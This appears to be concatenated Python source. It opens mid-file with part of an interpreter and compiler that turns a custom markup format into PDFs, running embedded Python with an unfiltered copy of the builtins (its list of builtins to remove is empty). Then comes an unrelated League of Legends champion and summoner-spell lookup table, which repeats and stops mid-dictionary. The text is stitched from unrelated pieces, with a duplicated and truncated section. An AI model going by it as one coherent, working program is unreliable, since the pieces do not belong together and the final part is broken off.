cmnd_args[key] = key_arg.text_group # now take each name from the POSITIONAL-ARGUMENT names provided in # the command's definition and provide the values for them from # the command call for param_name, arg in zip(cmnd_and_key_param_names, node.cmnd_tex_args): # params are CommandParamNode cmnd_args[param_name] = arg.text_group # Init py_locals, the python local variables to add to the current # context py_locals = {} for key, arg in cmnd_args.items(): # Visit the argument node and get the tokens from it new_tokens = res.register(self.visit(arg, context, flags)) if res.error: return res # Convert the tokens to MarkedUpText, something that can be used # in Python marked_up_text = Tokenizer.marked_up_text_for_tokens(new_tokens) if marked_up_text == '<NONE>': marked_up_text = None # Assign each python local to its marked_up_text py_locals[key] = marked_up_text child_context = context.gen_child(cmnd_name_str, node.start_pos.copy(), py_locals) # Just check to make sure that a value has been passed for each needed argument for key, value in cmnd_args.items(): if value == 0: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'"{key}", an argument in {cmnd_name_str}, has no value. You need to pass in an argument for it in this call of the command.', )) else: child_context.symbols.set(key, value) self._push_context(child_context) # actually run the command now that its variables have been added to the context result = res.register(self.visit(command_to_call.text_group, child_context, flags)) if res.error: return res tokens = result self._pop_context() self._pop_command_node() if len(tokens) > 0: # Find the first Token and set space_before to True if the # command call had space_before = True, otherwise set it False for token in tokens: if isinstance(token, Token): token.space_before = node.cmnd_name.space_before break # Tells the Paragraph Node that a Command was called so that it can # decide whether to insert a paragraph break depending on whether # there was one before the Command was called or not tokens.insert(0, Interpreter.CommandCalled) return res.success(tokens) def _visit_TextGroupNode(self, node, context, flags): res = RunTimeResult() doc_tokens = res.register(self.visit(node.document, context, flags)) if res.error: return res for token in doc_tokens: if isinstance(token, Token): token.space_before = node.ocbrace.space_before break return res.success(doc_tokens) def _visit_PlainTextNode(self, node, context, flags): res = RunTimeResult() return res.success(node.plain_text) # ----------------------------- # Helper Classes class CommandCalled: """ A helper class that just tells the Paragraph Node that a Command was called so that it can make an imformed decision on whether to add a paragraph break """ pass # ----------------------------------------------------------------------------- # Compiler Class class CompilerProxy: """ The actual object that is given to files being compiled named 'compiler'. The reason this object is given and not the actual compiler because this makes it clear what methods are actually meant to be used in the files being compiled. """ def __init__(self, compiler): self._compiler = compiler # --------------------------------- # Methods for Directory/File Finding def main_file_path(self): """ The path to the main/input file that the compiler started with. """ return self._compiler.main_file_path() def main_file_dir(self): """ The directory that the main/input file is in. """ return self._compiler.main_file_dir() def curr_file_path(self): """ The path to the file that is currently being compiled i.e. the file that you are in when you call this method. """ return self._compiler.curr_file_path() def curr_file_dir(self): """ The directory that the current file being run is in. """ return self._compiler.curr_file_dir() # --------------------------------- # Methods for importing/inserting files def strict_import_file(self, file_path): self._compiler.strict_import_file(file_path) def std_import_file(self, file_path): self._compiler.std_import_file(file_path) def import_file(self, file_path): self._compiler.import_file(file_path) def far_import_file(self, file_path): self._compiler.far_import_file(file_path) def insert_file(self, file_path): self._compiler.insert_file(file_path) def strict_insert_file(self, file_path): self._compiler.strict_insert_file(file_path) def far_insert_file(self, file_path): self._compiler.far_insert_file(file_path) # --------------------------------- # Other Methods def placer_class(self): return self._compiler.placer_class() def set_placer_class(self, placer_class): return self._compiler.set_placer_class(placer_class) class Compiler: """ This object orchestrates the compilation of plaintext files into PDFs """ def __init__(self, input_file_path, path_to_std_dir, print_progess_bars=False, encoding='utf-8'): self._commands = {} self._files_by_path = {} assert path.isfile(input_file_path), f'The given path is not to a file or does not exist: {input_file_path}' self._input_file_path = input_file_path self._input_file_dir = path.dirname(input_file_path) self._std_dir_path = path_to_std_dir self._print_progress_bars = print_progess_bars self._encoding = encoding # The encoding that the pdfo files are in self._toolbox = ToolBox(self) self._compiler_poxy = CompilerProxy(self) self._placer_class = NaivePlacer self._interpreter_stack = [] # The globals that will be copied every time a fresh set of globals # is needed self._globals = {'__name__': __name__, '__doc__': None, '__package__': None, '__loader__': __loader__, '__spec__': None, '__annotations__': None, '__builtins__': _copy.deepcopy(globals()['__builtins__']), 'compiler':self._compiler_poxy, 'toolbox':self._toolbox} # remove any problematic builtins from the globals rem_builtins = [] for key in rem_builtins: self._globals['__builtins__'].pop(key) # ------------------------------------------------------------------------- # Main Methods def compile_pdf(self): """ Compiles the PDF and returns the PDFDocument that can be used to draw the PDF multiple times to different files. """ fresh_context = self._fresh_context(self._input_file_path) # Now run the main\input file self._insert_file(self._input_file_path, fresh_context, print_progress=self._print_progress_bars) from placer.token_stream import TokenStream return TokenStream(fresh_context.token_document(), self._placer_class, fresh_context.globals(), self._input_file_path, self._print_progress_bars).place_tokens() def compile_and_draw_pdf(self, output_pdf_path): """ Convenience function that compiles and draws the PDF """ self.compile_pdf().draw(output_pdf_path, print_progress=self._print_progress_bars) # ------------------------------------------------------------------------- # Helper Methods def _fresh_globals(self): """ Returns a fresh set of globals as they are before the program starts compiling. These globals are for the python exec and eval methods that are used to run python code. """ return {key:val for key, val in self._globals.items()} def _fresh_context(self, file_path): """ Returns a fresh context for running a file as if it were the main/input file (even if it isn't actually the main/input file). """ parent = None; entry_pos = None; token_document = []; locals = None context = Context(file_path, file_path, parent, entry_pos, token_document, self._fresh_globals(), locals, SymbolTable()) # insert the standard file into the context self._insert_file(self._path_to_std_file(STD_LIB_FILE_NAME), context, print_progress=self._print_progress_bars) return context def _push_interpreter(self): """ Pushes a new Interpreter onto the interpreter stack. """ self._interpreter_stack.append(Interpreter()) def _pop_interpreter(self): """ Pops the _curr_interpreter off the interpreter stack. """ return self._interpreter_stack.pop() def _curr_interpreter(self): """ Returns the current Interpreter. """ _is = self._interpreter_stack return None if len(_is) <= 0 else _is[-1] def _curr_context(self): """ Returns the current Context. """ ci = self._curr_interpreter() return None if ci is None else ci._curr_context def _curr_tok_document(self): """ Returns the current document made of tokens, not to be confused with the PDFDocument object that is returned by the Placer. The "document" returned by this method is a list of Tokens that can be given to a Placer to produce a PDFDocument. """ ci = self._curr_interpreter() return None if ci is None else ci._curr_document def _compiler_import_file(self, file_path, print_progress=False): """ Imports a file. If the file has not already been imported by the compiler, this method will read in the file, tokenize, and parse it into an Abstract Syntax Tree (AST), before caching the raw_text, tokens, and ast in a File object and returning the File object. If the file has already been imported, this method will return the cached File object. To run the file object, the root of the AST must be visited by the Interpreter. This can be acheived by doing Interpreter().visit_root(file.ast) """ assert path.isfile(file_path), f'Could not import "{file_path}"' file_path = path.abspath(file_path) # If file already imported, just return the file if file_path in self._files_by_path: return self._files_by_path[file_path] file = File(file_path) self._files_by_path[file_path] = file try: with open(file_path, encoding=self._encoding) as f: file.raw_text = f.read() # Raw text that the file contains except: raise AssertionError(f'Could not decode the given file as {self._encoding}.') file.tokens = Tokenizer(file.file_path, file.raw_text, print_progress_bar=print_progress).tokenize() # Returns a ParseResult, so need to see if any errors. If no Errors, then set file.ast to the actual abstract syntax tree file.ast = Parser(file.tokens, print_progress_bar=print_progress).parse() if file.ast.error is not None: raise file.ast.error else: file.ast = file.ast.node return file def _run_file(self, file, context, print_progress=False): """ Runs a file, importing it first if need be, and returns the tokens and context that that the file generates. By "import", I mean that it loads the file into memory, tokenizes it and makes it into an AST, not that it does the same thing as the \\import command context is the current Context that you want the file to be run in. """ if isinstance(file, str): # It should be a file path file_obj = self._compiler_import_file(file, print_progress) else: # It should be a File object file_obj = file if file_obj.being_run: raise AssertionError(f"The given file is already being run (imported or inserted), so you probably have a circular import which is not allowed: {file_obj.file_path}") else: file_obj.being_run = True self._push_interpreter() # Save the context's current display_name and file_path old_disp_name = context.display_name old_path = context.file_path # Give the context the display name and file path of the file it is now # going into context.display_name = file_obj.file_path context.file_path = file_obj.file_path # Since just pushed interpreter, self._curr_interpreter() should not be None result = self._curr_interpreter().visit_root(file_obj.ast, context, InterpreterFlags(), print_progress) # Restore the context's display name and file_path to what they were before context.display_name = old_disp_name context.file_path = old_path self._pop_interpreter() if result.error: raise result.error file_obj.being_run = False return result.value # Return the tokens gotten by running the file def _insert_file(self, file_path, context, print_progress=False): """ Inserts the file into the current file. This means that the file must be run with the current context as if it were directly in the file. context is the context that this file is being inserted into """ # Since the context is directly given to self._run_file, all of the # commands and whatnot in the global portion of the file will be # added to the given context as if it was in the context directly # and not in another file was_global = context.global_level context.global_level = True i = len(context.token_document()) self._run_file(file_path, context, print_progress) # Want to add a space before the first Token we come accross. # Note: the compiler may still not render a space before the token # if the token is at the start of a line. That is why this is safe # to do. We are meely saying "this Token should have a space before # it if it makes sense to have one before it" doc = context.token_document() ci = self._curr_interpreter() if ci and ci.curr_command_node(): ccc = ci.curr_command_node() length = len(doc) while True: if i >= length: # reached end of Token document without finding a single # Token break curr = doc[i] if isinstance(curr, Token): # Found a Token so set whether it has a space before it based # on the current command that is being run and whether # the command has a space before it (i.e. if there is # space before \insert{file_path}, then the first token # of the inserted text from the file should have a space # before it, otherwise it should not have a space before # it) curr.space_before = ccc.cmnd_name.space_before break i += 1 context.global_level = was_global def _import_file(self, file_path, context, commands_to_import=None, print_progress=False): """ Imports a file. This is very different from self._insert_file because it takes the file, gives it a fresh context, and runs the file. The resulting context can be saved to the File object for the file because the resulting global context from running the file does not depend on any other file's context. In this way, once a file is imported once, its resulting tokens and Context can be reused over and over again, whereas the tokens and Context from self._insert_file cannot be and the file must be re-run every time it is inserted into a file, regardless of whether it has been inserted into a file before. context is the context that you want to import the file into. If commands_to_import are given, then only the commands by the names specified in the list of strings will be imported. All Python globals will still, however, be imported. """ file_obj = self._compiler_import_file(file_path, print_progress) if file_obj.import_context is None: # Since this file has not yet been run, we will have to run it # now with a fresh context unrelated to any other context # Using file_obj.file path in case it is different from the argument file_path context_to_import = self._fresh_context(file_obj.file_path) tokens = self._run_file(file_obj, context_to_import, print_progress) # Since the file was imported, that means it does not depend on the # current context and thus the context can be saved and reused later file_obj.import_context = context_to_import # I expect most imports to have some global Python code that they # want to be run on the second pass, so that code must be imported # too or else it will never reach the Placer and be run. tokens_to_import = [] for token in tokens: if isinstance(token, Token) and token.type in (TT.EXEC_PYTH2, TT.EVAL_PYTH2): tokens_to_import.append(token) file_obj.import_tokens = tokens_to_import else: # Since this file has been imported before, just reuse the same # context as last time because the context is not dependant # on the current context of when/where the file is being run context_to_import = file_obj.import_context tokens_to_import = file_obj.import_tokens try: context.import_(context_to_import, tokens_to_import, commands_to_import) except AssertionError as e: raise AssertionError(f'{file_path} could not be imported because of the following error:{e}') def _path_to_std_file(self, file_path): """ Returns the file path as a file path to a standard directory file. """ # Replace the ending of the file path with the one used by all standard files split_file_path = file_path.split('.') if len(split_file_path) > 1 and split_file_path[-1] == STD_FILE_ENDING: split_file_path.pop() split_file_path.append(STD_FILE_ENDING) file_path = '.'.join(split_file_path) # check if the file exists file_path = path.abspath(path.join(self._std_dir_path, file_path)) return file_path def _path_rel_to_file(self, file_path, curr_file=True): """ Returns the file path if the given path is relative to the main file being run or the current file being run. """ dir = self.curr_file_dir() if curr_file else self.main_file_dir() file_path = path.abspath(path.join(dir, file_path)) return file_path def _get_near_path(self, file_path): """ Gets the near path to insert/import. This checks the path relative to to the current file first, then checks the file relative to the main/input file, and then it checks the standard directory. """ ret_path = cf_rel_path = self._path_rel_to_file(file_path, curr_file=True) if not path.isfile(ret_path): ret_path = input_rel_path = self._path_rel_to_file(file_path, curr_file=False) if not path.isfile(ret_path): _file_path, file_name = path.split(file_path) ret_path = std_path = self._path_to_std_file(file_path) assert path.isfile(std_path), f'Could not get near path for "{file_path}" because neither "{cf_rel_path}", nor "{input_rel_path}", nor "{std_path}" lead to a file and/or exist.' return ret_path def _get_far_path(self, file_path): """ Gets the far path to insert/import. This checks the standard directory first and then checks the path relative to the main/input file and then checks the path relative to the current file. """ _file_path, file_name = path.split(file_path) ret_path = std_path = self._path_to_std_file(file_path) if not path.isfile(ret_path): ret_path = input_rel_path = self._path_rel_to_file(file_path, curr_file=False) if not path.isfile(ret_path): ret_path = cf_rel_path = self._path_rel_to_file(file_path, curr_file=True) assert path.isfile(std_path), f'Could not get far path for "{file_path}" because neither "{std_path}", nor "{input_rel_path}", nor "{cf_rel_path}" lead to a file and/or exist.' return ret_path # ------------------------------------ # Methods available from CompilerProxy # Methods for Inserting and Importing Files def insert_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot insert into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._insert_file(self._get_near_path(file_path), cc, print_progress=self._print_progress_bars) def strict_insert_file(self, file_path): """ Runs the file at the given file path and inserts it into the current document. The file path is assumed to be relative to the current file. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot insert into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' # Actually insert the file self._insert_file(self._path_rel_to_file(file_path), cc, print_progress=self._print_progress_bars) def far_insert_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot far insert into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._insert_file(self._get_far_path(file_path), cc, print_progress=self._print_progress_bars) def strict_import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. This file path is assumed to be relative to the main file being run. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._path_rel_to_file(file_path), cc, print_progress=self._print_progress_bars) def import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._get_near_path(file_path), cc, print_progress=self._print_progress_bars) def std_import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._path_to_std_file(file_path), cc, print_progress=self._print_progress_bars) def far_import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._get_far_path(file_path), cc, print_progress=self._print_progress_bars) # Methods for retrieving files and directories for the current file. def main_file_path(self): """ Returns the file path to the main/first/input file that is/was run. """ return self._input_file_path def main_file_dir(self): """ Returns an absolute path to the directory that the main file that is being run is in. """ return path.dirname(self.main_file_path()) def curr_file_path(self): """ Returns an absolute path to the current file that is being run. """ cc = self._curr_context() assert cc is not None, f'The current context was None so the current file path could not be retrieved.' return cc.file_path def curr_file_dir(self): """ Returns an absolute path to the directory that the current file that is being run is in. """ return path.dirname(self.curr_file_path()) # Misc Methods def placer_class(self): return self._placer_class def set_placer_class(self, placer_class): """ Sets the placer class that will be used to place the tokens on the PDF. This allows a person to, theoretically, create their own placer in a pdfo file and make the compiler use that instead. """ self._placer_class = placer_class class Command: """ Represents a command in the file. """ __slots__ = ['params', 'key_params', 'text_group'] def __init__(self, params, key_params, text_group): self.params = params self.key_params = key_params self.text_group = text_group # This will be run for the command
champions = [{'id': u'62', 'key': u'MonkeyKing'}, {'id': u'24', 'key': u'Jax'}, {'id': u'35', 'key': u'Shaco'}, {'id': u'19', 'key': u'Warwick'}, {'id': u'76', 'key': u'Nidalee'}, {'id': u'143', 'key': u'Zyra'}, {'id': u'63', 'key': u'Brand'}, {'id': u'33', 'key': u'Rammus'}, {'id': u'420', 'key': u'Illaoi'}, {'id': u'42', 'key': u'Corki'}, {'id': u'201', 'key': u'Braum'}, {'id': u'34', 'key': u'Anivia'}, {'id': u'23', 'key': u'Tryndamere'}, {'id': u'21', 'key': u'MissFortune'}, {'id': u'83', 'key': u'Yorick'}, {'id': u'101', 'key': u'Xerath'}, {'id': u'15', 'key': u'Sivir'}, {'id': u'92', 'key': u'Riven'}, {'id': u'61', 'key': u'Orianna'}, {'id': u'41', 'key': u'Gangplank'}, {'id': u'54', 'key': u'Malphite'}, {'id': u'78', 'key': u'Poppy'}, {'id': u'30', 'key': u'Karthus'}, {'id': u'126', 'key': u'Jayce'}, {'id': u'53', 'key': u'Blitzcrank'}, {'id': u'48', 'key': u'Trundle'}, {'id': u'113', 'key': u'Sejuani'}, {'id': u'104', 'key': u'Graves'}, {'id': u'236', 'key': u'Lucian'}, {'id': u'150', 'key': u'Gnar'}, {'id': u'99', 'key': u'Lux'}, {'id': u'102', 'key': u'Shyvana'}, {'id': u'58', 'key': u'Renekton'}, {'id': u'114', 'key': u'Fiora'}, {'id': u'222', 'key': u'Jinx'}, {'id': u'429', 'key': u'Kalista'}, {'id': u'105', 'key': u'Fizz'}, {'id': u'38', 'key': u'Kassadin'}, {'id': u'37', 'key': u'Sona'}, {'id': u'8', 'key': u'Vladimir'}, {'id': u'112', 'key': u'Viktor'}, {'id': u'203', 'key': u'Kindred'}, {'id': u'69', 'key': u'Cassiopeia'}, {'id': u'57', 'key': u'Maokai'}, {'id': u'412', 'key': u'Thresh'}, {'id': u'10', 'key': u'Kayle'}, {'id': u'120', 'key': u'Hecarim'}, {'id': u'121', 'key': u'Khazix'}, {'id': u'2', 'key': u'Olaf'}, {'id': u'115', 'key': u'Ziggs'}, {'id': u'134', 'key': u'Syndra'}, {'id': u'36', 'key': u'DrMundo'}, {'id': u'43', 'key': u'Karma'}, {'id': u'1', 'key': u'Annie'}, {'id': u'84', 'key': u'Akali'}, {'id': u'89', 'key': u'Leona'}, {'id': u'157', 'key': u'Yasuo'}, {'id': u'85', 'key': u'Kennen'}, {'id': u'107', 'key': u'Rengar'}, {'id': u'13', 'key': u'Ryze'}, {'id': u'98', 'key': u'Shen'}, {'id': u'154', 'key': u'Zac'}, {'id': u'80', 'key': u'Pantheon'}, {'id': u'50', 'key': u'Swain'}, {'id': u'432', 'key': u'Bard'}, {'id': u'14', 'key': u'Sion'}, {'id': u'67', 'key': u'Vayne'}, {'id': u'75', 'key': u'Nasus'}, {'id': u'4', 'key': u'TwistedFate'}, {'id': u'31', 'key': u'Chogath'}, {'id': u'77', 'key': u'Udyr'}, {'id': u'25', 'key': u'Morgana'}, {'id': u'106', 'key': u'Volibear'}, {'id': u'51', 'key': u'Caitlyn'}, {'id': u'122', 'key': u'Darius'}, {'id': u'56', 'key': u'Nocturne'}, {'id': u'26', 'key': u'Zilean'}, {'id': u'268', 'key': u'Azir'}, {'id': u'68', 'key': u'Rumble'}, {'id': u'72', 'key': u'Skarner'}, {'id': u'17', 'key': u'Teemo'}, {'id': u'6', 'key': u'Urgot'}, {'id': u'32', 'key': u'Amumu'}, {'id': u'3', 'key': u'Galio'}, {'id': u'74', 'key': u'Heimerdinger'}, {'id': u'22', 'key': u'Ashe'}, {'id': u'161', 'key': u'Velkoz'}, {'id': u'27', 'key': u'Singed'}, {'id': u'110', 'key': u'Varus'}, {'id': u'29', 'key': u'Twitch'}, {'id': u'86', 'key': u'Garen'}, {'id': u'20', 'key': u'Nunu'}, {'id': u'11', 'key': u'MasterYi'}, {'id': u'60', 'key': u'Elise'}, {'id': u'12', 'key': u'Alistar'}, {'id': u'55', 'key': u'Katarina'}, {'id': u'245', 'key': u'Ekko'}, {'id': u'82', 'key': u'Mordekaiser'}, {'id': u'117', 'key': u'Lulu'}, {'id': u'266', 'key': u'Aatrox'}, {'id': u'119', 'key': u'Draven'}, {'id': u'223', 'key': u'TahmKench'}, {'id': u'9', 'key': u'FiddleSticks'}, {'id': u'91', 'key': u'Talon'}, {'id': u'5', 'key': u'XinZhao'}, {'id': u'64', 'key': u'LeeSin'}, {'id': u'44', 'key': u'Taric'}, {'id': u'90', 'key': u'Malzahar'}, {'id': u'127', 'key': u'Lissandra'}, {'id': u'131', 'key': u'Diana'}, {'id': u'18', 'key': u'Tristana'}, {'id': u'421', 'key': u'RekSai'}, {'id': u'39', 'key': u'Irelia'}, {'id': u'59', 'key': u'JarvanIV'}, {'id': u'267', 'key': u'Nami'}, {'id': u'202', 'key': u'Jhin'}, {'id': u'16', 'key': u'Soraka'}, {'id': u'45', 'key': u'Veigar'}, {'id': u'40', 'key': u'Janna'}, {'id': u'111', 'key': u'Nautilus'}, {'id': u'28', 'key': u'Evelynn'}, {'id': u'79', 'key': u'Gragas'}, {'id': u'238', 'key': u'Zed'}, {'id': u'254', 'key': u'Vi'}, {'id': u'96', 'key': u'KogMaw'}, {'id': u'103', 'key': u'Ahri'}, {'id': u'133', 'key': u'Quinn'}, {'id': u'7', 'key': u'Leblanc'}, {'id': u'81', 'key': u'Ezreal'}] summoner_spells = {'SummonerBoost': {'summonerLevel': 6, 'key': 'SummonerBoost', 'id': 1, 'description': 'Removes all disables and summoner spell debuffs affecting your champion and lowers the duration of incoming disables by 65% for 3 seconds.', 'name': 'Cleanse'}, 'SummonerBarrier': {'summonerLevel': 4, 'key': 'SummonerBarrier', 'id': 21, 'description': 'Shields your champion for 115-455 (depending on champion level) for 2 seconds.', 'name': 'Barrier'}, 'SummonerExhaust': {'summonerLevel': 4, 'key': 'SummonerExhaust', 'id': 3, 'description': 'Exhausts target enemy champion, reducing their Movement Speed and Attack Speed by 30%, their Armor and Magic Resist by 10, and their damage dealt by 40% for 2.5 seconds.', 'name': 'Exhaust'}, 'SummonerOdinGarrison': {'summonerLevel': 1, 'key': 'SummonerOdinGarrison', 'id': 17, 'description': 'Allied Turret: Grants massive regeneration for 8 seconds. Enemy Turret: Reduces damage dealt by 80% for 8 seconds.', 'name': 'Garrison'}, 'SummonerHeal': {'summonerLevel': 1, 'key': 'SummonerHeal', 'id': 7, 'description': 'Restores 90-345 Health (depending on champion level) and grants 30% Movement Speed for 1 second to you and target allied champion. This healing is halved for units recently affected by Summoner Heal.', 'name': 'Heal'}, 'SummonerHaste': {'summonerLevel': 1, 'key': 'SummonerHaste', 'id': 6, 'description': 'Your champion can move through units and has 27% increased Movement Speed for 10 seconds.', 'name': 'Ghost'}, 'SummonerDot': {'summonerLevel': 10, 'key': 'SummonerDot', 'id': 14, 'description': 'Ignites target enemy champion, dealing 70-410 true damage (depending on champion level) over 5 seconds, grants you vision of the target, and reduces healing effects on them for the duration.', 'name': 'Ignite'}, 'SummonerPoroThrow': {'summonerLevel': 1, 'key': 'SummonerPoroThrow', 'id': 31, 'description': 'Toss a Poro at your enemies. If it hits, you can quickly travel to your target as a follow up.', 'name': 'Poro Toss'}, 'SummonerClairvoyance': {'summonerLevel': 8, 'key': 'SummonerClairvoyance', 'id': 2, 'description': 'Reveals a small area of the map for your team for 5 seconds.', 'name': 'Clairvoyance'}, 'SummonerMana': {'summonerLevel': 1, 'key': 'SummonerMana', 'id': 13, 'description': "Restores 40% of your champion's maximum Mana. Also restores allies for 40% of their maximum Mana.", 'name': 'Clarity'}, 'SummonerPoroRecall': {'summonerLevel': 1, 'key': 'SummonerPoroRecall', 'id': 30, 'description': "Quickly travel to the Poro King's side.", 'name': 'To the King!'}, 'SummonerFlash': {'summonerLevel': 8, 'key': 'SummonerFlash', 'id': 4, 'description': "Teleports your champion a short distance toward your cursor's location.", 'name': 'Flash'}, 'SummonerTeleport': {'summonerLevel': 6, 'key': 'SummonerTeleport', 'id': 12, 'description': 'After channeling for 3.5 seconds, teleports your champion to target allied structure, minion, or ward.', 'name': 'Teleport'}, 'SummonerSmite': {'summonerLevel': 10, 'key': 'SummonerSmite', 'id': 11, 'description': 'Deals 390-1000 true damage (depending on champion level) to target epic or large monster or enemy minion.', 'name': 'Smite'}, 'SummonerSnowball': {'summonerLevel': 1, 'key': 'SummonerSnowball', 'id': 32, 'description': 'Throw a snowball in a straight line at your enemies. If it hits an enemy, they become marked and your champion can quickly travel to the marked target as a follow up.', 'name': 'Mark'}} def get_champion(id): for c in champions: if c['id'] == id: return c return def get_champion_name(id): for c in champions: if int(c['id']) == int(id): return c['key'] return def get_spell(id): for s in summoner_spells: if summoner_spells[s]['id'] == id: return s return def get_spell_name(id): for s in summoner_spells: if int(summoner_spells[s]['id']) == int(id): return summoner_spells[s]['key'] return
champions = [{'id': u'62', 'key': u'MonkeyKing'}, {'id': u'24', 'key': u'Jax'}, {'id': u'35', 'key': u'Shaco'}, {'id': u'19', 'key': u'Warwick'}, {'id': u'76', 'key': u'Nidalee'}, {'id': u'143', 'key': u'Zyra'}, {'id': u'63', 'key': u'Brand'}, {'id': u'33', 'key': u'Rammus'}, {'id': u'420', 'key': u'Illaoi'}, {'id': u'42', 'key': u'Corki'}, {'id': u'201', 'key': u'Braum'}, {'id': u'34', 'key': u'Anivia'}, {'id': u'23', 'key': u'Tryndamere'}, {'id': u'21', 'key': u'MissFortune'}, {'id': u'83', 'key': u'Yorick'}, {'id': u'101', 'key': u'Xerath'}, {'id': u'15', 'key': u'Sivir'}, {'id': u'92', 'key': u'Riven'}, {'id': u'61', 'key': u'Orianna'}, {'id': u'41', 'key': u'Gangplank'}, {'id': u'54', 'key': u'Malphite'}, {'id': u'78', 'key': u'Poppy'}, {'id': u'30', 'key': u'Karthus'}, {'id': u'126', 'key': u'Jayce'}, {'id': u'53', 'key': u'Blitzcrank'}, {'id': u'48', 'key': u'Trundle'}, {'id': u'113', 'key': u'Sejuani'}, {'id': u'104', 'key': u'Graves'}, {'id': u'236', 'key': u'Lucian'}, {'id': u'150', 'key': u'Gnar'}, {'id': u'99', 'key': u'Lux'}, {'id': u'102', 'key': u'Shyvana'}, {'id': u'58', 'key': u'Renekton'}, {'id': u'114', 'key': u'Fiora'}, {'id': u'222', 'key': u'Jinx'}, {'id': u'429', 'key': u'Kalista'}, {'id': u'105', 'key': u'Fizz'}, {'id': u'38', 'key': u'Kassadin'}, {'id': u'37', 'key': u'Sona'}, {'id': u'8', 'key': u'Vladimir'}, {'id': u'112', 'key': u'Viktor'}, {'id': u'203', 'key': u'Kindred'}, {'id': u'69', 'key': u'Cassiopeia'}, {'id': u'57', 'key': u'Maokai'}, {'id': u'412', 'key': u'Thresh'}, {'id': u'10', 'key': u'Kayle'}, {'id': u'120', 'key': u'Hecarim'}, {'id': u'121', 'key': u'Khazix'}, {'id': u'2', 'key': u'Olaf'}, {'id': u'115', 'key': u'Ziggs'}, {'id': u'134', 'key': u'Syndra'}, {'id': u'36', 'key': u'DrMundo'}, {'id': u'43', 'key': u'Karma'}, {'id': u'1', 'key': u'Annie'}, {'id': u'84', 'key': u'Akali'}, {'id': u'89', 'key': u'Leona'}, {'id': u'157', 'key': u'Yasuo'}, {'id': u'85', 'key': u'Kennen'}, {'id': u'107', 'key': u'Rengar'}, {'id': u'13', 'key': u'Ryze'}, {'id': u'98', 'key': u'Shen'}, {'id': u'154', 'key': u'Zac'}, {'id': u'80', 'key': u'Pantheon'}, {'id': u'50', 'key': u'Swain'}, {'id': u'432', 'key': u'Bard'}, {'id': u'14', 'key': u'Sion'}, {'id': u'67', 'key': u'Vayne'}, {'id': u'75', 'key': u'Nasus'}, {'id': u'4', 'key': u'TwistedFate'}, {'id': u'31', 'key': u'Chogath'}, {'id': u'77', 'key': u'Udyr'}, {'id': u'25', 'key': u'Morgana'}, {'id': u'106', 'key': u'Volibear'}, {'id': u'51', 'key': u'Caitlyn'}, {'id': u'122', 'key': u'Darius'}, {'id': u'56', 'key': u'Nocturne'}, {'id': u'26', 'key': u'Zilean'}, {'id': u'268', 'key': u'Azir'}, {'id': u'68', 'key': u'Rumble'}, {'id': u'72', 'key': u'Skarner'}, {'id': u'17', 'key': u'Teemo'}, {'id': u'6', 'key': u'Urgot'}, {'id': u'32', 'key': u'Amumu'}, {'id': u'3', 'key': u'Galio'}, {'id': u'74', 'key': u'Heimerdinger'}, {'id': u'22', 'key': u'Ashe'}, {'id': u'161', 'key': u'Velkoz'}, {'id': u'27', 'key': u'Singed'}, {'id': u'110', 'key': u'Varus'}, {'id': u'29', 'key': u'Twitch'}, {'id': u'86', 'key': u'Garen'}, {'id': u'20', 'key': u'Nunu'}, {'id': u'11', 'key': u'MasterYi'}, {'id': u'60', 'key': u'Elise'}, {'id': u'12', 'key': u'Alistar'}, {'id': u'55', 'key': u'Katarina'}, {'id': u'245', 'key': u'Ekko'}, {'id': u'82', 'key': u'Mordekaiser'}, {'id': u'117', 'key': u'Lulu'}, {'id': u'266', 'key': u'Aatrox'}, {'id': u'119', 'key': u'Draven'}, {'id': u'223', 'key': u'TahmKench'}, {'id': u'9', 'key': u'FiddleSticks'}, {'id': u'91', 'key': u'Talon'}, {'id': u'5', 'key': u'XinZhao'}, {'id': u'64', 'key': u'LeeSin'}, {'id': u'44', 'key': u'Taric'}, {'id': u'90', 'key': u'Malzahar'}, {'id': u'127', 'key': u'Lissandra'}, {'id': u'131', 'key': u'Diana'}, {'id': u'18', 'key': u'Tristana'}, {'id': u'421', 'key': u'RekSai'}, {'id': u'39', 'key': u'Irelia'}, {'id': u'59', 'key': u'JarvanIV'}, {'id': u'267', 'key': u'Nami'}, {'id': u'202', 'key': u'Jhin'}, {'id': u'16', 'key': u'Soraka'}, {'id': u'45', 'key': u'Veigar'}, {'id': u'40', 'key': u'Janna'}, {'id': u'111', 'key': u'Nautilus'}, {'id': u'28', 'key': u'Evelynn'}, {'id': u'79', 'key': u'Gragas'}, {'id': u'238', 'key': u'Zed'}, {'id': u'254', 'key': u'Vi'}, {'id': u'96', 'key': u'KogMaw'}, {'id': u'103', 'key': u'Ahri'}, {'id': u'133', 'key': u'Quinn'}, {'id': u'7', 'key': u'Leblanc'}, {'id': u'81', 'key': u'Ezreal'}] summoner_spells = {'SummonerBoost': {'summonerLevel': 6, 'key': 'SummonerBoost', 'id': 1, 'description': 'Removes all disables and summoner spell debuffs affecting your champion and lowers the duration of incoming disables by 65% for 3 seconds.', 'name': 'Cleanse'}, 'SummonerBarrier': {'summonerLevel': 4, 'key': 'SummonerBarrier', 